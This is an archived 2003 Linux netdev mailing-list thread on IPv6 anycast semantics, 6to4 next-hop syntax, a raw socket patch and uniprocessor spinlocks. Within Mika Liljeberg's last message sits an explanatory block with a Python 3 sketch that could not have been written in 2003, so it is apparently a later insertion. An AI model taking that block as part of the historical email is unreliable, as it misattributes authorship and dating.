> > Alexey > From davem@redhat.com Wed Jul 16 19:33:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 19:33:47 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H2XgFl012529 for ; Wed, 16 Jul 2003 19:33:43 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id TAA24544; Wed, 16 Jul 2003 19:23:16 -0700 Date: Wed, 16 Jul 2003 19:23:16 -0700 From: "David S. Miller" To: kuznet@ms2.inr.ac.ru Cc: kuznet@dub.inr.ac.ru, jmorris@redhat.com, mika.liljeberg@welho.com, pekkas@netcore.fi, netdev@oss.sgi.com Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast usage) Message-Id: <20030716192316.04117f92.davem@redhat.com> In-Reply-To: <200307170223.GAA13064@dub.inr.ac.ru> References: <200307170223.GAA13064@dub.inr.ac.ru> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4123 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Thu, 17 Jul 2003 06:23:52 +0400 (MSD) kuznet@ms2.inr.ac.ru wrote: > Here it is. Please, review and complain. If Pekka agrees with semantics, the patch looks sound by my eyes. From davem@redhat.com Wed Jul 16 20:03:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 20:03:26 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H33IFl013484 for ; Wed, 16 Jul 2003 20:03:19 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id TAA24588; Wed, 16 Jul 2003 19:53:46 -0700 Date: Wed, 16 Jul 2003 19:53:45 -0700 From: "David S. 
Miller" To: netdev@oss.sgi.com, linux-net@vger.kernel.org Cc: zwane@arm.linux.org.uk Subject: Fw: [PATCH][2.6] propogate rx errors from raw_rcv_skb Message-Id: <20030716195345.21b9b9fc.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4124 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev Forwarded... Zwane, please post networking patches to the "networking" lists, thanks. Begin forwarded message: Date: Wed, 16 Jul 2003 22:46:59 -0400 (EDT) From: Zwane Mwaikambo To: Linux Kernel Cc: "David S. Miller" Subject: [PATCH][2.6] propogate rx errors from raw_rcv_skb Hi David, This looks somewhat sane, ipv6 doesn't seem to need it as it always returns 0 Index: linux-2.6.0-test1-mm1/net/ipv4/raw.c =================================================================== RCS file: /build/cvsroot/linux-2.6.0-test1-mm1/net/ipv4/raw.c,v retrieving revision 1.1.1.1 diff -u -p -B -r1.1.1.1 raw.c --- linux-2.6.0-test1-mm1/net/ipv4/raw.c 16 Jul 2003 06:37:19 -0000 1.1.1.1 +++ linux-2.6.0-test1-mm1/net/ipv4/raw.c 16 Jul 2003 16:11:50 -0000 @@ -252,8 +252,7 @@ int raw_rcv(struct sock *sk, struct sk_b skb_push(skb, skb->data - skb->nh.raw); - raw_rcv_skb(sk, skb); - return 0; + return raw_rcv_skb(sk, skb); } static int raw_send_hdrinc(struct sock *sk, void *from, int length, From nalkunda@egr.msu.edu Wed Jul 16 21:25:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 21:25:46 -0700 (PDT) Received: from sys14.mail.msu.edu (sys14.mail.msu.edu [35.9.75.114]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H4PYFl016011 for ; Wed, 16 Jul 2003 21:25:35 -0700 Received: from elans.cse.msu.edu ([35.9.43.164] helo=elans-pc.elans.cse.msu.edu) by sys14.mail.msu.edu with asmtp (Exim 4.10 #3) (TLSv1:RC4-MD5:128)
(authenticated as nalkunda) id 19d0Kf-000Nqi-00; Thu, 17 Jul 2003 00:25:29 -0400 Content-Type: text/plain; charset="iso-8859-1" From: N N Ashok Organization: CSE, Michigan State University To: Krishna Kumar Subject: Re: Kernel locking up in module Date: Thu, 17 Jul 2003 00:18:10 -0400 User-Agent: KMail/1.4.3 Cc: netdev@oss.sgi.com, Stephen Hemminger References: <200307142031.15122.nalkunda@egr.msu.edu> <200307152128.34341.nalkunda@egr.msu.edu> In-Reply-To: <200307152128.34341.nalkunda@egr.msu.edu> MIME-Version: 1.0 Message-Id: <200307170018.11043.nalkunda@egr.msu.edu> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6H4PYFl016011 X-archive-position: 4125 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nalkunda@egr.msu.edu Precedence: bulk X-list: netdev > > From what I read in "Understanding the Linux Kernel", the timer > routine that I setup is executed from the bottom half. Also in the book it > says that data structures accessed in deferrable functions (which a bottom > handler is I think), there is no need of any kind of locking/protection > required for uniprocessor machines. Also it says that if we try to acquire > a spin_lock on a uniprocessor in the kernel, then the kernel control path > that does have the lock will not get a chance to release the lock and hence > we will have a deadlock. > In this context, I am unable to understand whether I should use > locking and if so which kind. Do I need to disable the IRQs (_irq) when I > take the lock? Or do I disable the bottom halves (_bh) ? Please help me in > understanding and resolving the problem as it is required for my thesis. > > Thanks and Regards, > Ashok Hi, I understand that on uniprocessor machines, spin locks are just empty. Is that true? 
The code that I was looking at from include/linux/spinlock.h was (although there are 2-3 other definitions for these but they also essentially are not doing much): #define rwlock_init(lock) do { } while(0) #define read_lock(lock) (void)(lock) /* Not "unused variable". */ #define read_unlock(lock) do { } while(0) #define write_lock(lock) (void)(lock) /* Not "unused variable". */ #define write_unlock(lock) do { } while(0) Can somebody confirm this? If so then how do we protect data structures in kernel control paths? Thanks, Ashok From pekkas@netcore.fi Wed Jul 16 23:51:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 23:51:11 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H6p4Fl019826 for ; Wed, 16 Jul 2003 23:51:05 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6H6onU01703; Thu, 17 Jul 2003 09:50:49 +0300 Date: Thu, 17 Jul 2003 09:50:49 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: davem@redhat.com, Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <200307170003.EAA12843@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4126 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Thu, 17 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > > > What happens when you do "ping6 3FFE:FFFF:A:B::1" ? > > ping did, does and will work and I do not understand what you want > to say or ask. Do you want to know how it works? > > Well, IPv6 stack looks up the address in routing tables, finds the route, > sees that it is on-link, sends NDISC, receiver replies, we create a frame > and send the echo request. To continue? 
:-) (Sorry, it seems I've caused a lot of confusion in some parts of this thread by typoeing link-local address when I used link-layer address.. sorry) So, assume you have 3FFE:FFFF:A:B::/64 prefix on link. On a host on that link, you've manually configured the next-hop to be the router on that link, 3FFE:FFFF:A:B::1. The procedure to obtain the knowledge on where to send packets whose next-hop is 3FFE:FFFF:A:B::1 seems quite simple, similar to ping6. As to obtaining the link-*local* address, there are several procedures none of which I would recommend. Checking the source address of a ND packet (e.g. in the ping6 example above), or using a protocol like ICMP name information queries (draft-ietf-ipngwg-icmp-name-lookups-10.txt). -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From pekkas@netcore.fi Thu Jul 17 00:04:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 00:04:55 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H74nFl020476 for ; Thu, 17 Jul 2003 00:04:50 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6H74XO01808; Thu, 17 Jul 2003 10:04:33 +0300 Date: Thu, 17 Jul 2003 10:04:33 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: davem@redhat.com, , Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT In-Reply-To: <200307170020.EAA12924@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4127 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Thu, 17 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > Yes, I dare to say that they're a requirement. > > Nope. IPv6 host routing is based on assumption of link-locality of the > next hop.
Probably, you want to read some rfcs or to look into code. This is not correct. Perhaps the RFC's have changed in the meantime, but at least RFC2461 does *not* make such an assumption (AFAICS). In the document, there is a basic assumption that the next-hop is *on-link*. In the document, there are assumptions on verifying whether the redirects come from the router you're currently using: this is simpler when you use only link-locals as next-hops, but it is certainly *NOT* a requirement. (The spec in question will be revised in the short term, so I'll take this issue up for clarification..) > > specifications use and the *users* want and need to use. > > Sigh, there no specifications about tricks used by Linux routing tables, > *users* are unlikely to want to use this feature at all, as Mika noticed. > And when they want, they want to right: > > ip route add 3ffe::.... via 193.233.7.65 That would be simpler but, we actually require: ip route add 3ffe::... via ::193.233.7.65 and thus require a route for ::/96. That's confusing: ::/96 has a very specific purpose in RFCs, and we should not be overloading the functionality, it's just plain confusing. > rather than crap sort of > > ip route add 3ffe::.... via 2002: I'm not saying we need to prevent the users from using the former. I'm just saying that we must not prevent the users from using the latter; please check e.g. the RFC3068 section 2.5. If we don't support something like that, it'll just confuse the users more. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. 
Martin: A Clash of Kings From mika.liljeberg@welho.com Thu Jul 17 01:37:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 01:37:34 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H8bMFl024561 for ; Thu, 17 Jul 2003 01:37:24 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6H8csLH024150; Thu, 17 Jul 2003 11:38:54 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6H8crJg024149; Thu, 17 Jul 2003 11:38:53 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast usage) From: Mika Liljeberg To: kuznet@ms2.inr.ac.ru Cc: kuznet , davem@redhat.com, jmorris@redhat.com, pekkas@netcore.fi, netdev@oss.sgi.com In-Reply-To: <200307170223.GAA13064@dub.inr.ac.ru> References: <200307170223.GAA13064@dub.inr.ac.ru> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058431132.5781.32.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 11:38:53 +0300 X-archive-position: 4128 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev Alexey, On Thu, 2003-07-17 at 05:23, kuznet@ms2.inr.ac.ru wrote: > diff -Nru a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c > --- a/net/ipv6/ndisc.c Thu Jul 17 06:13:09 2003 > +++ b/net/ipv6/ndisc.c Thu Jul 17 06:13:09 2003 > @@ -785,8 +785,7 @@ > ipv6_addr_all_nodes(&maddr); > ndisc_send_na(dev, NULL, &maddr, &ifp->addr, > ifp->idev->cnf.forwarding, 0, > - ipv6_addr_type(&ifp->addr)&IPV6_ADDR_ANYCAST ? 
0 : 1, > - 1); > + 1, 1); > in6_ifa_put(ifp); > return; > } > @@ -809,8 +808,7 @@ > if (neigh || !dev->hard_header) { > ndisc_send_na(dev, neigh, saddr, &ifp->addr, > ifp->idev->cnf.forwarding, 1, > - ipv6_addr_type(&ifp->addr)&IPV6_ADDR_ANYCAST ? 0 : 1, > - 1); > + 1, 1); > if (neigh) > neigh_release(neigh); > } I'm not sure you can just remove these. It seems possible (?) to have the anycast address configured on one of the interfaces as a unicast at the same time. I.e., one of the anycast members could own the address. For what it's worth, I think you have the right semantics. MikaL From kuznet@ms2.inr.ac.ru Thu Jul 17 02:06:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 02:06:57 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H96nFl025605 for ; Thu, 17 Jul 2003 02:06:50 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id NAA13688; Thu, 17 Jul 2003 13:06:37 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307170906.NAA13688@dub.inr.ac.ru> Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast To: mika.liljeberg@welho.com (Mika Liljeberg) Date: Thu, 17 Jul 2003 13:06:37 +0400 (MSD) Cc: davem@redhat.com, jmorris@redhat.com, pekkas@netcore.fi, netdev@oss.sgi.com In-Reply-To: <1058431132.5781.32.camel@hades> from "Mika Liljeberg" at Jul 17, 2003 11:38:53 AM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4129 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > I'm not sure you can just remove these. It seems possible (?) to have > the anycast address configured on one of the interfaces as a unicast at > the same time. I.e., one of the anycast members could own the address. 
They cannot intersect, otherwise RTF_LOCAL thing will not work. I deliberately blocked attempt to add a local address as anycast in anycast.c, see another chunk. But even that check is not necessary: non-superuser may listen only for reserved unicasts, which are excluded from allowed local addresses by policy. Kernel does not need even to worry about this. Actually, the test in ndisc.c was bogus by another reason: inet_addr_type() checks only for reserved anycasts and non-reserved unicasts, which would conflict with local addresses, were not detected in any case. Alexey From kuznet@ms2.inr.ac.ru Thu Jul 17 02:13:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 02:13:31 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H9DKFl026099 for ; Thu, 17 Jul 2003 02:13:21 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id EAA12924; Thu, 17 Jul 2003 04:20:46 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307170020.EAA12924@dub.inr.ac.ru> Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT To: pekkas@netcore.fi (Pekka Savola) Date: Thu, 17 Jul 2003 04:20:46 +0400 (MSD) Cc: davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: from "Pekka Savola" at Jul 16, 2003 09:12:04 AM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4130 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > Yes, I dare to say that they're a requirement. Nope. IPv6 host routing is based on assumption of link-locality of the next hop. Probably, you want to read some rfcs or to look into code. > the user space tools' problem: i.e. make them resolve a globally addressed > nexthop to a link-local nexthop. Impossible, as I said. 
[ NOTE, the subject changed back to correct one at this point. Seems, one sentence, written by me has grown to some huge tumor eating original one completely. :-) ] > specifications use and the *users* want and need to use. Sigh, there no specifications about tricks used by Linux routing tables, *users* are unlikely to want to use this feature at all, as Mika noticed. And when they want, they want to right: ip route add 3ffe::.... via 193.233.7.65 rather than crap sort of ip route add 3ffe::.... via 2002: I do not understand, what the hell is going on with you. I am already sorry that started this. :-) Alexey From mika.liljeberg@welho.com Thu Jul 17 02:31:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 02:31:04 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H9UwFl028163 for ; Thu, 17 Jul 2003 02:30:59 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6H9WXLH024342; Thu, 17 Jul 2003 12:32:34 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6H9WXox024341; Thu, 17 Jul 2003 12:32:33 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Anycast usage, final diagnosis? 
(was: IPv6: Fix broken anycast From: Mika Liljeberg To: kuznet@ms2.inr.ac.ru Cc: davem@redhat.com, jmorris@redhat.com, pekkas@netcore.fi, netdev@oss.sgi.com In-Reply-To: <200307170906.NAA13688@dub.inr.ac.ru> References: <200307170906.NAA13688@dub.inr.ac.ru> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058434352.5780.44.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 12:32:33 +0300 X-archive-position: 4131 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Thu, 2003-07-17 at 12:06, kuznet@ms2.inr.ac.ru wrote: > They cannot intersect, otherwise RTF_LOCAL thing will not work. > > I deliberately blocked attempt to add a local address as anycast > in anycast.c, see another chunk. Ok, I missed that one. I guess it's safe to assume that the anycast and unicast spaces will not intersect, even though the addresses are allocated from the same range. I was wondering how to dynamically assign anycast addresses. In theory one could abuse the unicast address assignment mechanisms (in the absence of anything else users might be tempted to try this). But that's a different issue. MikaL From pekkas@netcore.fi Thu Jul 17 03:41:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 03:42:01 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HAfkFl000334 for ; Thu, 17 Jul 2003 03:41:49 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6HAfWD04440; Thu, 17 Jul 2003 13:41:32 +0300 Date: Thu, 17 Jul 2003 13:41:31 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: Mika Liljeberg , , , , Subject: Re: Anycast usage, final diagnosis? 
(was: IPv6: Fix broken anycast In-Reply-To: <200307171030.OAA13906@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4132 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Thu, 17 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > Wait a second. What the hell is this in anycast.c? How is it possible > to allow to any user to create reserved anycast? > This makes them completely useless, everyone on LAN can join > anycast service and blackhole it, which will prevent listening by real servers. > > This cannot be right. I think the logic is illegally stolen > from multicast interface: only superuser calls can create/delete anycasts. > Non-superuser can only listen existing one. > > I would block JOIN/LEAVE for non-superuser completely. No user should be able to join anycast group, IMHO. (Of course, that hasn't been specifed anywhere, but the implementations should do what they think is best -- and I certainly think this is.) -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. 
Martin: A Clash of Kings From mika.liljeberg@welho.com Thu Jul 17 04:14:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 04:15:05 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HBEpFl001809 for ; Thu, 17 Jul 2003 04:14:53 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6HBGRLH024617; Thu, 17 Jul 2003 14:16:27 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6HBGQvU024616; Thu, 17 Jul 2003 14:16:26 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT From: Mika Liljeberg To: Pekka Savola Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058440586.5781.59.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 14:16:26 +0300 X-archive-position: 4133 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Thu, 2003-07-17 at 10:04, Pekka Savola wrote: > > ip route add 3ffe::.... via 193.233.7.65 > > That would be simpler but, we actually require: > > ip route add 3ffe::... via ::193.233.7.65 > > and thus require a route for ::/96. That's confusing: ::/96 has a very > specific purpose in RFCs, and we should not be overloading the > functionality, it's just plain confusing. I agree with Pekka. Alexey, you yourself admitted that this hack was put in, because you needed a way to represent an IPv4 address in IPv6 format. The IPv4-mapped format (::ffff:a.b.c.d) exists exactly for this purpose. 
User space tools can accept it as a.b.c.d and convert to IPv4-Mapped for the IPv6 API. There is no need to invent non-standard practises. It may be convenient to think that the IPv4 Internet is a virtual link connecting all 6to4 routers and IPv4 compatible addresses could be seen as the link-local addresses, but this is just an affectation that is not backed by any IETF specification. Overloading the IPv4-compatible address in this way is just confusing, because it creates the impression that the stack will actually take steps to resolve the gateway address to a next hop address that is on-link. (I'm not saying it should, but you can see where the confusion arises). MikaL From mika.liljeberg@welho.com Thu Jul 17 04:53:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 04:53:30 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HBrKFl002957 for ; Thu, 17 Jul 2003 04:53:21 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6HBswLH024717; Thu, 17 Jul 2003 14:54:58 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6HBsvnq024716; Thu, 17 Jul 2003 14:54:57 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT From: Mika Liljeberg To: Pekka Savola Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: <1058440586.5781.59.camel@hades> References: <1058440586.5781.59.camel@hades> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058442897.5780.69.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 14:54:57 +0300 X-archive-position: 4134 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: 
mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Thu, 2003-07-17 at 14:16, Mika Liljeberg wrote: > On Thu, 2003-07-17 at 10:04, Pekka Savola wrote: > > > ip route add 3ffe::.... via 193.233.7.65 > > > > That would be simpler but, we actually require: > > > > ip route add 3ffe::... via ::193.233.7.65 > > > > and thus require a route for ::/96. That's confusing: ::/96 has a very > > specific purpose in RFCs, and we should not be overloading the > > functionality, it's just plain confusing. > > I agree with Pekka. Alexey, you yourself admitted that this hack was put > in, because you needed a way to represent an IPv4 address in IPv6 > format. The IPv4-mapped format (::ffff:a.b.c.d) exists exactly for this > purpose. User space tools can accept it as a.b.c.d and convert to > IPv4-Mapped for the IPv6 API. There is no need to invent non-standard > practises. Ok, I have to correct myself a bit here. Looking at the 6to4 RFC it actually does recommend the fe80::v4addr format, already mentioned, in case a link-local address is needed. So we would have: ip route add 3ffe:... via fe80::bada:bee4 dev sitX Clean, although not as convenient for the user. 
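For reference, the address forms debated in this thread (IPv4-compatible
::a.b.c.d, IPv4-mapped ::ffff:a.b.c.d, the fe80::v4addr link-local form, and
the 2002:v4addr::/48 6to4 prefix) all carry the same 32 bits, just in
different positions. The following is only an illustrative sketch using
Python's standard ipaddress module; the helper name v4_embeddings is made up
for this example and is not part of iproute2 or the kernel.

```python
import ipaddress


def v4_embeddings(v4: str) -> dict:
    """Hypothetical helper: IPv6 forms that embed the given IPv4 address."""
    n = int(ipaddress.IPv4Address(v4))  # the address as a 32-bit integer
    return {
        # ::a.b.c.d, the IPv4-compatible form that lives in ::/96
        "compatible": ipaddress.IPv6Address(n),
        # ::ffff:a.b.c.d, the IPv4-mapped form
        "mapped": ipaddress.IPv6Address((0xFFFF << 32) | n),
        # fe80::a.b.c.d, link-local with the IPv4 address in the low 32 bits
        "link_local": ipaddress.IPv6Address((0xFE80 << 112) | n),
        # 2002:AABB:CCDD::/48, the 6to4 prefix derived from the IPv4 address
        "6to4_prefix": ipaddress.IPv6Network(((0x2002 << 112) | (n << 80), 48)),
    }


if __name__ == "__main__":
    for name, value in v4_embeddings("193.233.7.65").items():
        print(f"{name:12} {value}")
```

With 193.233.7.65 (0xc1e90741) the link-local form comes out as
fe80::c1e9:741 and the 6to4 prefix as 2002:c1e9:741::/48, which shows why a
bare fe80:: next hop no longer says on its face that it came from a 6to4
relay address.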
MikaL From nf@hipac.org Thu Jul 17 06:14:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 06:14:38 -0700 (PDT) Received: from indyio.rz.uni-saarland.de (indyio.rz.uni-saarland.de [134.96.7.3]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HDEKFl005545 for ; Thu, 17 Jul 2003 06:14:22 -0700 Received: from mars.rz.uni-saarland.de (mars.rz.uni-saarland.de [134.96.7.4]) by indyio.rz.uni-saarland.de (8.12.9/8.12.5) with ESMTP id h6HDECqk2847454; Thu, 17 Jul 2003 15:14:12 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de (e002.stw.stud.uni-saarland.de [134.96.65.17]) by mars.rz.uni-saarland.de (8.9.3p2/8.8.4/8.8.2) with ESMTP id PAA12803168; Thu, 17 Jul 2003 15:14:11 +0200 (CEST) Received: from e226.stw.stud.uni-saarland.de ([134.96.65.241] helo=hipac.org) by e002.stw.stud.uni-saarland.de with esmtp (Exim 3.35 #1 (Debian)) id 19d8aJ-0005EA-00; Thu, 17 Jul 2003 15:14:11 +0200 Message-ID: <3F16A0E5.1080007@hipac.org> Date: Thu, 17 Jul 2003 15:13:09 +0200 From: Michael Bellion and Thomas Heinz User-Agent: Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4) Gecko/20030714 Debian/1.4-2 X-Accept-Language: de, en MIME-Version: 1.0 To: hadi@cyberus.ca CC: linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [RFC] High Performance Packet Classifiction for tc framework References: <200307141045.40999.nf@hipac.org> <1058328537.1797.24.camel@jzny.localdomain> In-Reply-To: <1058328537.1797.24.camel@jzny.localdomain> X-Enigmail-Version: 0.76.2.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="------------enig7E93A75E61DF18B37FB81F90" X-archive-position: 4135 X-ecartis-version: Ecartis v1.0.0 Sender: 